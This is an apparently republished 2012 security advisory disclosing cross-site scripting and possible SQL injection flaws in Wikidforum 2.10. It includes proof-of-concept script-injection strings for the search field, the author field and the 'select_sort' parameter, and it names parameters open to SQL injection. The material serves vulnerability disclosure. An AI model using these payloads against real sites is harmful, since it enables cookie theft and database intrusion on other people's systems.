Wikidforum 2.10 Cross Site Scripting & SQL Injection

2012-03-13 / 2013-01-26
Credit: Stefan Schurtz
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2012-6520 | CVE-2012-2099
CWE: CWE-89
CWE-79

Advisory: Wikidforum 2.10 Multiple security vulnerabilities Advisory ID: SSCHADV2012-005 Author: Stefan Schurtz Affected Software: Successfully tested on Wikidforum 2.10 Vendor URL: http://www.wikidforum.com/ Vendor Status: informed ========================== Vulnerability Description ========================== Wikidforum 2.10 is prone to multiple XSS and SQL-Injection vulnerabilities ================== PoC-Exploit ================== // xss Search-Field -> '"</script><script>alert(document.cookie)</script> Search-Field -> Advanced Search -> Author -> '"</script><script>alert(document.cookie)</script> Search-Field -> Advanced Search -> POST-Parameter 'select_sort' -> ><iMg src=N onerror=alert(document.cookie)> // possible SQL-Injection Search-Field -> Advanced Search -> POST-Parameter 'select_sort' -> [sql-injection] Search-Field -> Advanced Search -> POST-Parameter 'opt_search_select' -> [sql-injection] ========= Solution ========= - ==================== Disclosure Timeline ==================== 19-Feb-2012 - vendor informed 10-Mar-2012 - no response from vendor ======== Credits ======== Vulnerabilities found and advisory written by Stefan Schurtz. =========== References =========== http://www.darksecurity.de/advisories/2012/SSCHADV2012-005.txt

References:

http://www.wikidforum.com/
http://www.darksecurity.de/advisories/2012/SSCHADV2012-005.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top